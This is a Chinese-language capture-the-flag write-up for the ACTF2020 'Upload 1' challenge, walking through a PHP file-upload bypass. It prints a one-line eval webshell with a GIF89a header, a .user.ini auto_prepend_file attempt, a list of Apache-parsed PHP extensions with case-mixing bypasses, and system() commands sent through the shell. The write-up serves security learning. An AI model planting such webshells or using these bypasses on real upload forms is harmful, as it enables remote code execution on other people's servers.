[ACTF2020 新生赛]Upload 1--详细解析

信息收集

题目告诉我们是一道upload,也就是文件上传漏洞题目。

进入界面,是一个灯泡,将鼠标放在图标上就会出现文件上传的相应位置:

思路

文件上传漏洞,先看看有没有前端校验。

在js源码中找到了前端校验:
也就是只能上传jpg,png,gif后缀的文件。

先准备一个最基本的一句话木马:

php 复制代码
//shell.php
GIF89a //这里是为了绕过可能存在的文件头检测
<?php @eval($_POST[1])?>

修改为.png后缀,上传并抓包修改回php后缀

注意左上角,返回的内容是nonono~ Bad file!

此时有两种可能,一种是后端对文件后缀进行了过滤;第二种是对文件内容进行了过滤。

如果我们不修改后缀将.png文件直接上传:

会发现左上角显示上传成功。

Upload Success! Look here~

./uplo4d/00bf23e130fa1e525e332ff03dae345d.png

说明后端对文件内容没有被过滤,被过滤的是后缀名

既然后缀名被过滤,我们考虑上传.user.ini文件将成功上传的文件以PHP代码形式解析:

php 复制代码
//.user.ini
GIF89a
auto_prepend_file=00bf23e130fa1e525e332ff03dae345d.png

同样是修改为.png绕过前端校验与MIME验证,再抓包改回来。

Upload Success! Look here~

./uplo4d/7356ccb66a890ccd51ee57dc56bb134c.ini

这里注意.user.ini文件名上传后被修改为7356ccb66a890ccd51ee57dc56bb134c.ini,那么.user.ini就不能发挥作用了,所以上传.user.ini配置文件的方法失败。

这里学习一个新知识点:

在Apache中,以下后缀名都会被服务器解析为PHP文件:

php 复制代码
phtml
php
php3
php4
php5
inc
//下面是对上面的大小写混写绕过
pHtml
pHp
pHp3
pHp4
pHp5
iNc

我们抓包测试一下这些后缀名,看看有没有能上传成功的:

发现html和php的大小写混写都能绕过。

先试了php的大小写混写,确实能上传,但是访问时依然显示解析出错。

还是上传了phtml文件,进入后发现成功访问!

php 复制代码
1=system("ls /");
1=system("tac /flag");

得到flag.

总结

学到了Apache下的php后缀名解析漏洞,今后在面对后端后缀名过滤时又多了一种解决方法。

相关推荐
youngzhiyong41 分钟前
恋爱通信史之保密性
web安全·网络安全·密码学
YAy172 小时前
Shiro550漏洞分析
java·开发语言·学习·网络安全·安全威胁分析
Hacker_Fuchen2 小时前
Redis密码设置与访问限制(网络安全)
redis·web安全·bootstrap
Smile灬凉城6663 小时前
CTF之密码学(键盘加密)
安全·web安全·密码学
网络安全Ash4 小时前
运维之网络安全抓包—— WireShark 和 tcpdump
网络·网络协议·安全·网络安全
尘佑不尘7 小时前
蓝队基础,了解企业安全管理架构
数据库·笔记·安全·web安全·蓝队
车联网安全杂货铺7 小时前
新能源整车厂车联网安全:架构、流程与融合
安全·网络安全·架构·车载系统·系统安全
山兔17 小时前
网络安全审计机制与实现技术
安全·web安全·php